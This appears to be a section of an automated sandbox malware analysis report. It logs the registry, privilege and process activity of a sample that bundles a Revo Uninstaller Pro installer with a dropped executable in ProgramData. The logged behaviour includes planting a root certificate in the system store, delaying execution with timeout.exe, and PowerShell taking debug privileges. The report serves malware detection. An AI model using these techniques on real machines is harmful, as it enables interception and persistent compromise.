Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mode.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF}\ = "RUExt" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
